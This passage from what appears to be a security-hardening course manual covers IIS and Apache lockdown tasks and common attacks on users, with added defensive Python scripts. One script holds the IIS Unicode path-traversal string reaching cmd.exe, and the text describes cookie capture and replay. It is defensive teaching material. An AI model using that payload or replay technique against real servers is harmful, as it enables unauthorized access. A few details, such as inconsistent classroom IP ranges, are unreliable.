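    decoded = lenient_utf8(percent_decode(request_path)).replace("\\", "/")
    resolved = posixpath.normpath(WEB_ROOT + "/" + decoded.lstrip("/"))
    if resolved != WEB_ROOT and not resolved.startswith(WEB_ROOT + "/"):
        return "BLOCKED"
    return resolved


DOTDOT_ATTACK = "/scripts/../../winnt/system32/cmd.exe"
UNICODE_ATTACK = "/scripts/..%c0%af../winnt/system32/cmd.exe"
BENIGN = "/scripts/test.asp"

if __name__ == "__main__":
    for p in (DOTDOT_ATTACK, UNICODE_ATTACK, BENIGN):
        print("%-45s check-then-decode: %-28s decode-then-check: %s"
              % (p, check_then_decode(p), decode_then_check(p)))
```

The output for the Unicode request is the whole story: the check-then-decode path resolves to /c/winnt/system32/cmd.exe, outside the Web root, while decode-then-check blocks it, and both treat the plain /../ request and the benign request identically.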

TASK 7C-2
Investigating IIS Security

Setup: A default install of Windows 2000 Server will have IIS 5.0 running. You will use the Security Configuration And Analysis snap-in to analyze your machine against the hisecweb.inf template.

Provide students with the location of the hisecweb.inf template file. If you have downloaded the self-extracting executable, have students extract the .inf file before proceeding to the next step.

1. Copy the file hisecweb.inf from the location specified by your instructor to your \WINNT\security\templates folder.
2. Start the MMC, and add the Security Configuration And Analysis standalone snap-in.
3. In the left pane, right-click Security Configuration And Analysis, and choose Open Database.
4. Enter newweb, and click Open.
5. From the Import Template dialog box, select hisecweb.inf, and click Open.
6. In the left pane, right-click Security Configuration And Analysis, and choose Analyze Computer Now.
7. Click OK. You should see a list of policies, services, Registry settings, and file-system information that should be set a certain way if this is to be a secure Web server.
8. Close the window without saving the console.

Web Site Configuration

The following task demonstrates how to host a site on your Web server.

TASK 7C-3
Implementing a Web Site

1. From the Start menu, choose Programs→Administrative Tools→Internet Services Manager.
2. In the left pane, click and expand the options under your computer. You should see items like Default Web Site and Default SMTP Virtual Server. These are the various Internet servers running on your machine.
3. Right-click Default Web Site, and choose Properties. You should see a dialog box with a number of tabs relating to this site. Clicking on any tab opens the Property page associated with that tab.
4. If necessary, select the Web Site tab.
5. In the IP Address box, observe that All Unassigned is displayed. This means that this Web site will respond to requests from any of the IP addresses associated with this computer. We need only one address to be active. For this default Web site, select the IP address connected to your classroom hub from the drop-down list. This is the one listed as 172.16.x.y if you are on the left side of the classroom or 172.18.x.y if you are on the right side. Click OK.
6. In Windows Explorer, navigate to the \Inetpub folder. This is the Windows default location for the various Internet-related servers.
7. In the Inetpub folder, create a folder called newweb.
8. Copy the file simple.htm from your course CD to this folder. It should be located in the \085545\Data\HTML Files folder.
9. Switch back to Internet Services Manager.
10. Right-click your computer name, and choose New→Web Site.
11. In the Web Site Creation Wizard, click Next.
12. For Description, enter newweb, and then click Next.
13. For IP Address To Use For This Web Site, select 172.26.x.y if you are on the left side of the class or 172.28.x.y if you are on the right side.
14. Click Next.
15. For Path To This Web Site's Home Directory, click Browse, and then navigate to and select the newweb folder that you created earlier.
16. Click Next twice, and then click Finish.
17. Right-click the new Web site, and choose Properties.
18. Click the Documents tab.
19. Click Add.
20. For the name of the default document, specify simple.htm, making sure that you match the spelling and capitalization.
21. Click OK.
22. Observe the screen. To the left of the box, there are a couple of bent arrows pointing up and down.
23. Click the Up Arrow button as many times as is necessary to push the simple.htm document to the very top of the list.
24. Click OK. Your new Web site should be set up.
25. Right-click the new Web site, and (if necessary) choose Start.
26. Ask your partner to open a browser and connect to your Web site, using http://172.26.x.y or http://172.28.x.y depending on your location in the classroom.
27. Do the same for your partner. You should be able to view the SCP Challenge Web site hosted on your partner's machine.

Web Site Maintenance

When you are conducting maintenance on a Web, FTP, or email site, you should first stop the server. When you are done with your work, you should start the server again, so that all of the changes you have made take effect properly.

TASK 7C-4
Starting and Stopping the Web Server

1. Switch to Internet Services Manager.
2. Right-click your Web site, and choose Stop.
3. Verify that your partner has done the same.
4. Switch to Internet Explorer, and refresh the page by choosing View→Refresh or by pressing F5. You should no longer be able to view the Web page.
5. Switch to Internet Services Manager.
6. Right-click your Web site, and choose Start.
7. Verify that your partner has done the same.
8. Switch to Internet Explorer, and refresh the page. You should again be able to view the Web page.
9. Switch to Internet Services Manager, and stop your Web server. You will be doing more configuration of the Web site in the next few tasks.

DoS Problems

One of the items that you should think about from a security standpoint is that a malicious user may try to bring down your Web server by keeping it so busy that CPU time is exhausted and the server stops responding. You can limit how much of the machine a single Web site is allowed to consume.

TASK 7C-5
Controlling Performance Settings

1. Right-click your Web site, and choose Properties.
2. Click the Performance tab.
3. Check Enable Process Throttling, and specify 25 percent. This setting depends on the number of Web sites hosted on the machine. (Process throttling limits the CPU time used by the site's out-of-process applications and CGI programs, not the core IIS process itself.)
4. Check Enforce Limits; otherwise, the only action that the Web server will take is to write an event to the Event Log when the limit is crossed.
5. Check Enable Bandwidth Throttling, and specify that the maximum bandwidth available to this Web site is 256 KB/s.
6. Leave the Newweb Properties open for the next task.

Web Server Directory Security

On a production machine, the home directory should not be located in the same partition as the operating system, as mentioned earlier. It should be in a separate NTFS partition; it could also be located on another machine on the network. Directory browsing should not be allowed, access to the script source should not be allowed, and only Read access to the Web site should be allowed. In the next task, you will take a look at some of these configuration options.

TASK 7C-6
Controlling the Home Directory Settings

Setup: The Newweb Properties are displayed.

1. Click the Home Directory tab.
2. Observe that you can control where the content should come from. Options include a directory on this computer, a share on some other computer on this network, or even a redirection to another URL. Leave this alone for now. Below this are some check boxes relating to Web site access.
3. Verify that Script Source Access, Write, and Directory Browsing are unchecked.

Web Server Access Controls

Access to your Web site can be controlled by specifying that only certain computers or domains should be granted access. You can also do the opposite: explicitly deny access to a computer or to a group of computers. Bear in mind that these rules are keyed on the client's source address, so they stop casual access rather than a determined attacker coming through a proxy, and that domain-name restrictions cost a reverse DNS lookup on each request, so address-based rules are preferable.

TASK 7C-7
Controlling Access Settings

Setup: The Newweb Properties are displayed.

1. Click the Directory Security tab.
2. Observe that there are three main areas you can work with regarding controlling access. They are Anonymous Access And Authentication Control, IP Address And Domain Name Restrictions, and Secure Communications. For now, you will work with just the middle option.
3. Click the Edit button next to IP Address And Domain Name Restrictions.
4. Observe that, by default, all computers will be granted access. You want to be more restrictive than the default.
5. Click Add.
6. Observe that you can specify a single machine, a group of machines, or a domain.
7. Leave the radio button selected for Single Computer.
8. Specify the IP address of your partner's computer. If your IP address is 172.26.10.1, specify that you will deny access to 172.26.10.2, and vice versa. Click OK twice.
9. Click OK, and restart your Web server.
10. Ask your partner to visit your Web site. Access to your Web site should be forbidden. Your partner should receive the message You Are Not Authorized To View This Page.
11. Stop your Web server again.
12. On the Directory Security tab of the Web server's Properties, click the Edit button next to IP Address And Domain Name Restrictions.
13. Select the computer that you have denied access to.
14. Click Remove, then click OK.
15. Click OK, and restart your Web server.
16. Ask your partner to visit your Web site. Your partner should be successful.
17. Close all open windows.

Patches and Hot Fixes

You have looked at some of the configuration options presented to you by IIS. However, if the underlying software itself is defective and has security holes, then no amount of correct configuration will help you. For this, you must be on the lookout for the latest announcements of attacks on Web servers, vulnerabilities discovered, and the ensuing fixes provided by Microsoft. Microsoft is proactive in this regard and works with many experts in the industry to provide a fix for a problem before it can get out of hand. Routinely checking for and applying updates to your Microsoft servers is recommended. Using the Windows Update command found in the Start menu takes you directly to Microsoft's Windows Update site, where your machine is scanned to determine which service packs and/or security hot fixes are already installed. This can also be automated so that your machine periodically checks for updates without intervention by you. In enterprise scenarios, you might not want your production machines to go out and update themselves automatically. Instead, you should apply such updates on a test machine first. When you want to apply a specific patch to your production machines, Microsoft releases it as a separate hot fix that you download. One such update, posted on October 30, 2002, Q327696, addresses four newly discovered security vulnerabilities affecting Web servers running on Windows computers:

Out-of-process Privilege Escalation
WebDAV Denial of Service
Script Source Access Vulnerability
Cross-site Scripting in IIS Administrative Pages

The first of the four in this list could enable applications on a server to gain system-level privileges. It was posted on Microsoft's Web site with a severity rating of Moderate.

If you were to visit Microsoft's site, you would also see that these four vulnerabilities had the numbers shown in the following table.

Vulnerability                                       Number
Out-of-process Privilege Escalation                 CAN-2002-0869
WebDAV Denial of Service                            CAN-2002-1182
Script Source Access Vulnerability                  CAN-2002-1180
Cross-site Scripting in IIS Administrative Pages    CAN-2002-1181

These numbers are hyperlinked to the Web site www.cve.mitre.org, where Common Vulnerabilities and Exposures are classified and the information is shared. A vulnerability that is thoroughly researched and classified is prefixed with the letters CVE, followed by the year and incident number. Until then, a temporary candidate number is allocated, so the prefix is CAN.

Another good tool to use with IIS is the IIS Lockdown tool, also downloadable from Microsoft's site at www.microsoft.com/downloads/release.asp?ReleaseID=43955. Follow this hyperlink and download the file iislockd.exe.

TASK 7C-8
Using the IIS Lockdown Tool

Provide students with the location of the IIS Lockdown tool file.

1. Copy the file iislockd.exe from the location provided by your instructor to your desktop.
2. Double-click iislockd.exe, and click Next.
3. Click I Agree, and then click Next.
4. Specify that you want to use the Dynamic Web Server (ASP Enabled) template, check View Template Settings, and click Next.
5. Check HTTP and FTP, and verify that SMTP and NNTP are unchecked. If a server has not been installed before, it will be grayed out and will not offer you any choice. If you were implementing this tool in a production environment and were sure that you would not use SMTP, then you would check Remove Unselected Services.
6. Leave the Remove Unselected Services check box unchecked for now, and click Next.
7. The next page deals with script maps and is important. Observe that, on the Script Maps page, the boxes you check are the ones that will be disabled.
8. Verify that only the box for ASP is unchecked, and click Next.
9. On the Additional Security page, again, all of the options that you select will be removed. Leave the Additional Security options checked as they are, and click Next.
10. Click Next to install the URLScan filter.
11. Verify the summary presented to you, and click Next.
12. Wait until the security settings are applied, then click Next, and click Finish. It takes only a minute or two to apply the security settings.

Hot-fix Checker

One good tool to use on a Windows box is the hot-fix checker HfNetChk. By downloading the tool from www.microsoft.com and running it, you will very quickly be able to record which hot fixes and service packs are installed on your machine, as well as which Knowledge Base articles you have to read to find out more about a particular fix.

An excellent article on Microsoft's Web site regarding how to harden a Windows 2000 Server with IIS running on it is Knowledge Base Article Q311135. A summary of the sequence of tasks is presented here. Please visit Microsoft's Web site to read the full article.
1. Install Service Pack 3.
2. Run Windows Update.
3. Install and run all IIS updates.
4. Install and run Hfnetchk to compile a list of needed hot fixes.
5. Install Qchain.exe.
6. Use Qchain.exe to install multiple hot fixes with only one restart.

TASK 7C-9
Using the Hot Fix Net Check Tool

Provide students with the location of the Hot Fix Net Check tool file.

1. Copy the nshc332.exe file from the location provided by your instructor to your desktop.
2. Double-click nshc332.exe, and click Yes twice to install and to accept the License Agreement.
3. Point to a location where you want to install the extracted files, and click OK. For instance, you could create a folder on your boot partition named hfnetchk, and install the files there.
4. Read the instructions presented to you, and click OK.
5. Open a command prompt, and navigate to the folder where you installed the extracted files.
6. Enter hfnetchk to check your OS installation. If you are not connected to the Internet, you may see a couple of error messages while the executable attempts to contact microsoft.com, but you can ignore these for now.
7. View the results.
8. Enter hfnetchk /? to see the Help associated with this executable.
9. Read the description of what HFNETCHK does. Microsoft Knowledge Base Articles Q303215 and Q315665 provide additional information; both are available from Microsoft's Web site.
10. Examine the various switches available for use with the tool.
11. Enter hfnetchk -v to obtain more detailed output.
12. View the results.
13. Close all open windows.

Apache

For all the press that Microsoft's IIS has gotten regarding security vulnerabilities, such as those detailed above, you might think that it is the most prolific Web server, but this is not the case. The Web server that runs the majority of the Web sites on the Internet is called Apache. In a recent survey, Apache servers were running 63 percent of the Web sites on the Internet. For comparison, IIS is running approximately 23 percent of the sites. Updated statistics can be found at www.netcraft.com.

Apache is an Open Source application that runs on Linux and UNIX computers. You can obtain the most recent version and release information at www.apache.org. In addition to the Web site, most Linux distributions include the application as well. Check the Web site associated with your release for current Apache updates.

Once Apache is running on your server, configuration can begin. The default installation of the Apache Web server is run under the apache user. This account is neither required to, nor has access to, write to the server configuration directories, such as etc/httpd/conf. The configuration files are owned by root, and the apache user is given only Read permissions to these files. It is suggested that you create a new user account to manage these files, as root would have no reason to update them. It is also suggested that you do not make the apache user account the managing user for these files.

454

Hardening The Infrastructure (SCP)

Another critical file for configuration is the httpd.conf file. Previously, the config options were stored in three separate files: access.conf, srm.conf, and httpd.conf. Now, the only file that requires editing of this data is the httpd.conf file. Although there are many different options for managing this file, we will look at some of the parameters. The ServerType option is used to define whether the Apache server will run on its own or as part of inetd. It is recommended that the server run on its own, as a standalone server. The KeepAlive option is used to define the settings for connection times. This setting is where you define idle time and how long the server will wait for subsequent client requests. The ServerRoot option is used to define the root of the server. It is very strongly recommended that the server root not be the actual root directory itself. Commonly, etc/httpd/ will be the root.

One of the files that can be created and used by the Apache server is the .htpasswd file. This file is used to contain users and passwords for authentication purposes to the server. The .htpasswd file is encrypted on the hard disk, and by default, it is owned by root and the root group.

These are just a few of the many configuration options that you will have when you are configuring a secure Apache Web server. Once you have locked down your server, you may see why this is the most popular Web server on the Internet.
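The following Python script is an added example, not part of the course materials, that checks an httpd.conf fragment against the recommendations above (ServerType standalone, ServerRoot not the filesystem root, KeepAlive idle time set explicitly, an unprivileged User) and verifies that a configuration file is not writable by the apache user's group or by others. The configuration text is constructed for the example; the audit only covers one-line directives, not container sections.

```python
"""Audit an httpd.conf fragment and the permissions of a config file.
Added example, not part of the course; SAMPLE_CONF is constructed."""
import os
import stat
import tempfile

# Constructed sample that violates two of the recommendations in the text.
SAMPLE_CONF = """
# constructed sample, not a real server configuration
ServerType inetd
ServerRoot "/"
KeepAlive On
KeepAliveTimeout 15
User apache
Group apache
"""


def parse_directives(conf_text):
    """Return {directive: value} for one-line directives.

    Comments, blank lines and container sections (<Directory> ...) are
    skipped and surrounding quotes are removed. A later occurrence
    overrides an earlier one, as in Apache itself."""
    directives = {}
    for raw in conf_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or line.startswith("<"):
            continue
        parts = line.split(None, 1)
        value = parts[1].strip().strip('"') if len(parts) > 1 else ""
        directives[parts[0]] = value
    return directives


def audit_directives(directives):
    """Return a list of findings; an empty list means the fragment passes."""
    findings = []
    # The text recommends running standalone rather than under inetd.
    if directives.get("ServerType", "standalone").lower() != "standalone":
        findings.append("ServerType: run standalone rather than under inetd")
    # The server root must never be the actual root directory.
    root = directives.get("ServerRoot", "")
    if root == "" or os.path.normpath(root) == os.sep:
        findings.append("ServerRoot: must not be the filesystem root; "
                        "etc/httpd is typical")
    # KeepAlive is where idle time is defined; insist that it is explicit.
    if (directives.get("KeepAlive", "Off").lower() == "on"
            and "KeepAliveTimeout" not in directives):
        findings.append("KeepAlive: idle time (KeepAliveTimeout) "
                        "is not set explicitly")
    # The default installation runs under the apache user, never root.
    if directives.get("User") == "root":
        findings.append("User: the server must run as an unprivileged "
                        "account such as apache")
    return findings


def config_writable_by_group_or_others(path):
    """True if the group or world write bit is set on the config file.

    The text wants the files owned by root with only Read access for the
    apache user, so either write bit is a finding."""
    mode = os.stat(path).st_mode
    return bool(mode & (stat.S_IWGRP | stat.S_IWOTH))


def demo():
    """Run both checks on the constructed sample.

    Returns (directive findings, permission result for a group-writable
    copy of the file, permission result for a read-only copy)."""
    findings = audit_directives(parse_directives(SAMPLE_CONF))
    fd, path = tempfile.mkstemp(suffix=".conf")
    try:
        with os.fdopen(fd, "w") as fh:
            fh.write(SAMPLE_CONF)
        os.chmod(path, 0o664)   # group-writable: the apache group could edit it
        writable = config_writable_by_group_or_others(path)
        os.chmod(path, 0o644)   # owner read/write, everyone else read-only
        readonly = config_writable_by_group_or_others(path)
    finally:
        os.unlink(path)
    return findings, writable, readonly


if __name__ == "__main__":
    for finding in demo()[0]:
        print(finding)
```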

Topic 7D
Describing Methods Used to Attack Users

Hack Attacks Targeting Users

In the past (meaning the late 1980s to early 1990s), most users of the Internet were technical in nature, and connections to the Internet were not that common. Once the World Wide Web began evolving and large-scale national ISPs began showing up, casual users started to log on. By the year 2000, there were many people who considered their Internet connections more vital to their lives than having the lights on.

Such an evolution, so fast, has come with downsides. The vast majority of users on the Internet are not even aware of security issues, let alone taking steps to protect themselves. Many ISPs do not provide adequate security-related information to their users, and more and more people connect each day.

Email Hack Attacks

Of all the potential areas where users of the Internet are at risk, perhaps their email systems are the most vulnerable. Even more accurate would be to state that the potential risk is what can be done with the email system. Email hacking is generally done using one of two methods. The first is to have the email message itself be the hack, by using HTML. The second, and more common, is to attach malicious files to email messages and send them to unknowing victims.

HTML Email Attacks

HTML email attacks are popular, but a bit harder than they seem to be at first glance. The premise of HTML email hacking is to embed the hacker's code into the actual body of the message, so that it is executed by the receiving user's computer, but is not visible to that user.

The ability to create an HTML email message in Outlook Express (and Outlook) is built in to the program. To turn on HTML composing:

1. Open Outlook Express.
2. Choose Tools→Options.
3. In the Options dialog box, select the Send tab.
4. On the Send tab, under Mail Sending Format, select HTML.
5. Click OK.

Further options for HTML formatting of Outlook Express email are the choices of different MIME (Multipurpose Internet Mail Extensions) encoding options, and sending pictures with a message. See Figure 7-10 for an example of these settings.

Figure 7-10: The encoding options for HTML email in Outlook Express.

That being said, let's take a look at an example of an email message encoded in HTML, shown in Figure 7-11.

Figure 7-11: An example of an HTML email as a text document.

This email is harmless, but it is evident that the amount of what can be encoded in HTML is limited only by the imagination of the composer.

Although users and hackers have the option to turn on HTML encoded email, simply having the option to do so does not equate to educated hackers using HTML properly. It is much easier for most hackers to persuade victims to open attachments, as we will see in a moment.

Scripting Vulnerabilities

Although the possibilities of HTML encoded email are unlimited, there are specific areas of the target users' computers that the hacker will want to take advantage of. One of these is the ability to execute scripts by the user's email client.

Outlook and Outlook Express have made the lives of hackers much easier by allowing the ability to attack a user simply by having him or her read an email or view it in the Preview pane. This is due to the ActiveX options included in these Microsoft programs. We will move off the subject of email hacking for a moment to define ActiveX. ActiveX is an implementation of mobile code by Microsoft. The Microsoft definition of ActiveX is "A set of technologies that allows software components to interact with one another in a networked environment, regardless of the language in which the components were created."

ActiveX applications (controls) are written to provide a specific purpose, such as showing a movie clip, and are embedded into Web pages to provide this ability. The ActiveX controls, which have an .OCX file extension, are embedded into Web pages by using the <OBJECT> tag. Upon entering a Web site that has an embedded control, Internet Explorer checks the local user's Registry to locate the required component. If the control is not already on the user's system, Internet Explorer downloads and installs the control into the area defined by the Web page's <OBJECT> tag.

To stop a hacker from executing any control they wish, Microsoft included an authentication system called Authenticode. Authenticode requires software developers to have their work signed, and a notice of this shows on the user's screen in the form of a pop-up window. If the control has not been signed under the Authenticode system, a warning pops up, informing the user of this.

Although the Authenticode system is effective, Microsoft has included an ActiveX issue with their Safe For Scripting option. There are two noted controls that ship with IE that have this Safe For Scripting option set. Setting this flag means that the system will go ahead and execute these controls without using the Authenticode system. To compound the issue, the two controls, named Scriptlet.typelib and EyeDog.Ocx, have the ability to access the user's files. Additionally, Scriptlet.typelib has the ability to edit, create, and even overwrite files on the user's local hard drive.

The code example shown in Figure 7-12 was written by Georgi Guninski, who has found many security vulnerabilities and has provided full documentation on them. This code would execute upon viewing the associated Web page. The end result of this code is a simple alert window, but the only limitation is the imagination.

Figure 7-12: Georgi Guninski's example of Safe For Scripting vulnerabilities.

The code shown in Figure 7-12 illustrates an example of embedding scripting in Web pages. Next, we will discuss the option to embed code into email messages.

Just as IE has Safe For Scripting, so do Outlook and Outlook Express. By composing an HTML email message that calls the correct control, as in the Web example above, users can end up executing unknown code. Email scripting problems for Outlook and Outlook Express can be greatly diminished by disabling the Preview option. In most situations, simply previewing the message with the code is all that is required for execution.

File Attachments

Nearly all email users have, at some point in time, used the file-attachment feature of email. To send documents to and receive documents from others quickly is one of the most important features of being connected on the Internet, and one of the reasons many people connect in the first place.

This natural desire to connect and exchange data (file attachments) is exactly what hackers can take advantage of. And, do they ever! Why bother with complicated scripting or other techniques to get a user to launch the code of choice the hard way, when it would be much easier to simply send him or her the code and have the targeted user install it? This is now the only method used by some hackers. Administrators battle this problem every minute of every day. Even though users (and administrators are also users) are instructed not to open attachments from unknown sources, they still will and do. The issue gets even more complex, however.

Just when the word was starting to sink in that no one should ever open an attachment from an unknown source, along came the attack of the worms. Melissa was the first high-profile example of this new breed of attack. The attack was simple: repeat this message to everyone in your Address Book. The ILOVEYOU worm continued this method, bringing email systems to a halt again. Networks were flooded with virtually the same email message, only with different senders and receivers.

Since everyone is supposed to know not to open unknown attachments, how did ILOVEYOU become so effective? The answer is simple: it did not come from an unknown source. It was replicated from someone to their Address Book, meaning that they, at least casually, knew the recipients. The line "kindly check the attached LOVELETTER coming from me" was too much temptation for people to ignore.

A different type of attachment trick, although still used, is less effective as the user base becomes more educated about attachments. This technique is to pad the real name of a file by using spaces. A file may look like it is named tonight.doc, but if one looks carefully, the associated icon is not a document icon, and there are other visual indicators to the right of the file name, such as the standard three periods in parentheses (...). This indicates a longer name than tonight.doc, and is worth exploring further to see the true identity of the file. In Figure 7-13, you can see that the file name, on first glance, says tonight.doc, but there are signs that the file is not a document. It has the executable icon, and the (...) would lead to the conclusion that there is a long file name issue here. This file will need investigation before execution (if it even will be executed).

Figure 7-13: An example of a hidden extension.

The final approach to email attachments we will discuss here is to use the built-in messages Outlook has for errors and notifications. The following is one of the more common ones that hackers may employ: "This message uses a character set that is not supported by the Internet Service. To view the original message content, open the attached message. If the text doesn't display correctly, save the attachment to disk, and then open it using a viewer that can display the original character set."

This message appears normally in conjunction with errors of the MIME process. It can be just as easily used to convince users to open attachments they may not normally open. The imagination becomes the only limitation on using this.
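The following Python script is an added example, not part of the course materials, that inspects a message for the three tricks covered in the Scripting Vulnerabilities and File Attachments discussions: active content tags (script or object) in an HTML body, Outlook's "unsupported character set" wording reused as a lure, and an attachment name padded with spaces so that the real extension is hidden, as in the tonight.doc example. The message, the classid and the attachment bytes are constructed placeholders.

```python
"""Flag HTML active content, the character-set lure and padded attachment
names in an email. Added example, not part of the course; the sample
message below is constructed and contains no real control or program."""
import os
import re
from email.parser import BytesParser

# HTML constructs the text warns about: scripts and embedded (ActiveX) objects.
ACTIVE_CONTENT = re.compile(r"<\s*(script|object|embed|applet)\b", re.IGNORECASE)
# Outlook's own error wording, which the text shows being reused as a lure.
LURE_TEXT = re.compile(r"character set that is not supported", re.IGNORECASE)
EXECUTABLE_EXTENSIONS = {".exe", ".com", ".bat", ".cmd", ".scr", ".pif", ".vbs", ".js"}

# The padded name from Figure 7-13: the viewer shows "tonight.doc (...)".
PADDED_NAME = "tonight.doc" + " " * 30 + ".exe"

# Constructed sample message with CRLF line endings, as it would arrive.
SAMPLE_MAIL = b"\r\n".join([
    b"From: friend@example.test",
    b"To: victim@example.test",
    b"Subject: kindly check the attached LOVELETTER coming from me",
    b"MIME-Version: 1.0",
    b'Content-Type: multipart/mixed; boundary="outer"',
    b"",
    b"--outer",
    b'Content-Type: text/html; charset="us-ascii"',
    b"",
    b"<html><body><p>This message uses a character set that is not supported",
    b"by the Internet Service. To view the original message content, open",
    b"the attached message.</p>",
    b'<object classid="clsid:PLACEHOLDER-NOT-A-REAL-CLSID"></object>',
    b"</body></html>",
    b"--outer",
    b"Content-Type: application/octet-stream",
    b'Content-Disposition: attachment; filename="' + PADDED_NAME.encode() + b'"',
    b"Content-Transfer-Encoding: base64",
    b"",
    b"TVqQAA==",  # constructed four bytes, not a real program
    b"--outer--",
    b"",
])


def suspicious_attachment_name(name):
    """Return a reason string if the attachment name is deceptive, else None.

    Detects the padding trick (two or more spaces between a harmless-looking
    extension and the real one), a double extension, and a plain executable."""
    real_ext = os.path.splitext(name.rstrip())[1].lower()
    if real_ext not in EXECUTABLE_EXTENSIONS:
        return None
    if re.search(r"\.\w+\s{2,}\.\w+$", name):
        return "padded name hides executable extension " + real_ext
    if name.count(".") > 1:
        return "double extension ends in " + real_ext
    return "executable attachment " + real_ext


def inspect_message(raw_bytes):
    """Walk every MIME part of the message and return a list of findings."""
    msg = BytesParser().parsebytes(raw_bytes)
    findings = []
    for part in msg.walk():
        if part.is_multipart():
            continue
        filename = part.get_filename()
        if filename:
            reason = suspicious_attachment_name(filename)
            if reason:
                findings.append("attachment: " + reason)
            continue
        ctype = part.get_content_type()
        if ctype in ("text/plain", "text/html"):
            charset = part.get_content_charset() or "us-ascii"
            body = part.get_payload(decode=True).decode(charset, "replace")
            if ctype == "text/html" and ACTIVE_CONTENT.search(body):
                findings.append("html body: active content tag (script/object)")
            if LURE_TEXT.search(body):
                findings.append("body: Outlook 'unsupported character set' "
                                "wording used as a lure")
    return findings


if __name__ == "__main__":
    for finding in inspect_message(SAMPLE_MAIL):
        print(finding)
```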

Cookies

No discussion on the security of users of the Internet would be complete without a discussion on cookies. Cookies are, for now, a necessary evil. Without cookies, users of their favorite Web sites would have to continuously re-enter information. Cookies are divided into one of two types: persistent and per-session. A persistent cookie is one that stores information in a text file on the user's hard drive. A per-session cookie is one that stores the needed information only during the open session; when the browser is closed, it is no longer stored.

Disabling cookies might seem like a good idea, but most people could not use the Web to do what they want without using cookies. Using the option of Prompt Before Acceptance Of Cookies will annoy most people enough to turn off the option within the first few minutes of browsing their favorite sites.

In the event that a user's system is compromised, a search for cookies could reveal much personal information about that user. But it is possible to gain access to a cookie without even attempting to compromise a user's system.

By using a packet sniffer tool (such as Network Monitor and Ethereal), hackers can capture the cookie as it travels on the wire. Once the cookie has been captured, it can be replayed against the target server, and the hacker can enter the Web site using his or her new identity.

packet sniffer: A device or program that monitors the data travelling between computers on a network.

sniffer: A program to capture data across a computer network. Used by hackers to capture user ID names and passwords. Software tool that audits and identifies network traffic packets. Is also used legitimately by network operations and maintenance personnel to troubleshoot network problems.

DSL and Cable Modem Vulnerabilities

With the advent of high-speed, always-on Internet connections for the home user, ISPs have created a whole new playing field for hackers. No longer are the long hours of searching for potential targets required. If a hacker is simply looking for a target to practice on, there are now thousands of targets within the hacker's immediate reach.

These thousands of people were potential targets before, but targeting a user who is only on every now and then, with a slow connection and a different IP address every time, is not the most attractive of targets. High-speed Internet access has changed all that. No longer is that potential target moving; generally, high-speed Internet connections have static IP addresses or renewed dynamic addresses. No longer is that potential target on a slow connection every now and then. Once the hacker has identified the target, he or she can be confident that the target will be there in the future and ready to respond, only a few ping packets away.

Virtually all home users who are now enjoying their newly found high-speed access, and are leaving their computers on 24x7 to take advantage of all they can, are unaware of the increased security risks they now face. It is hard enough for full-time security administrators to get the users in their networks to follow solid security practices, so imagine the situation for the home users. If they just purchased a shiny new PC with Windows 2000 Professional loaded, why would they know to modify the Administrator account properties, or to turn on logging? Hackers around the world are, at this very moment, scanning for these systems to use at their discretion.
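The following Python script is an added example, not part of the course materials, that classifies Set-Cookie headers as persistent or per-session in the sense the Cookies discussion above uses (a persistent cookie carries an Expires or Max-Age attribute and is written to disk) and flags cookies that a packet sniffer could capture on the wire. The Secure and HttpOnly attributes it checks are the standard cookie attributes, not something the course text describes; the header values are constructed.

```python
"""Classify Set-Cookie headers and flag cookies exposed to wire capture.
Added example, not part of the course; SAMPLE_SET_COOKIES is constructed."""

# Constructed Set-Cookie values as a server might send them.
SAMPLE_SET_COOKIES = [
    "SESSIONID=abc123; Path=/; Secure; HttpOnly",
    "prefs=theme-dark; Expires=Wed, 09 Jun 2021 10:18:14 GMT; Path=/",
    "cart=42; Max-Age=2592000; Path=/; HttpOnly",
    "visitor=7; Path=/",
]


def parse_set_cookie(header_value):
    """Split one Set-Cookie value into (name, value, attributes).

    Attribute names are lower-cased; flags such as Secure get an empty
    string. The Expires date contains a comma, so only ';' separates parts."""
    parts = [p.strip() for p in header_value.split(";")]
    name, _, value = parts[0].partition("=")
    attrs = {}
    for part in parts[1:]:
        key, _, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip()
    return name.strip(), value.strip(), attrs


def classify(header_value):
    """Describe a cookie's lifetime and transport flags."""
    name, _, attrs = parse_set_cookie(header_value)
    # Persistent: stored in a file on the user's disk until Expires/Max-Age.
    # Per-session: kept in memory and discarded when the browser closes.
    persistent = "expires" in attrs or "max-age" in attrs
    return {
        "name": name,
        "persistent": persistent,
        "secure": "secure" in attrs,      # sent only over https://
        "httponly": "httponly" in attrs,  # hidden from scripts in the page
    }


def audit(set_cookie_values):
    """Return (cookie name, issue) pairs for cookies that a sniffer on the
    wire could capture and replay, or that page scripts could read."""
    findings = []
    for header_value in set_cookie_values:
        info = classify(header_value)
        if not info["secure"]:
            lifetime = "persistent" if info["persistent"] else "per-session"
            findings.append((info["name"], lifetime + " cookie sent without "
                             "Secure: capturable on the wire and replayable"))
        if not info["httponly"]:
            findings.append((info["name"],
                             "readable by scripts in the page (no HttpOnly)"))
    return findings


if __name__ == "__main__":
    for name, issue in audit(SAMPLE_SET_COOKIES):
        print(name, "-", issue)
```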

TASK 7D-1
Identifying User Vulnerabilities and Internet Security Concerns

Setup: This is a group activity.

1. Discuss, with at least one other student, the security issues surrounding users of the Internet and World Wide Web. Identify the different risk points discussed, and list the areas of greatest concern for these users. Define what the potential counters for these risks are.
2. As a group, combine the topics of this lesson into a comprehensive view of the architecture of the Internet and associated risk points. Use your previous work on the physical structure of the Internet, adding potential locations of Web servers and users.
3. Once the overall layouts of components, servers, and users have been identified, attempt to define the potential risk points for each piece. Are the risk points for the Internet infrastructure as critical now that you can combine all the other issues versus when that was the only concern?
4. Create a consensus on the risk points and outline them for future reference. These risk points are the same in this scenario as they are on the actual Internet.

Try to categorize the risk points of the entire scenario in order of risk. There is no definite order to them, as they are subject to opinion.

Browser Security

So what is a browser? A browser is the client side of an application that is typically used to view Web pages hosted on a Web site, which runs the server side of the application. Of course, today you can also use a browser to download files from or upload files to an FTP server, or you can use your browser to connect to an IMAP-enabled email server to retrieve and send email.

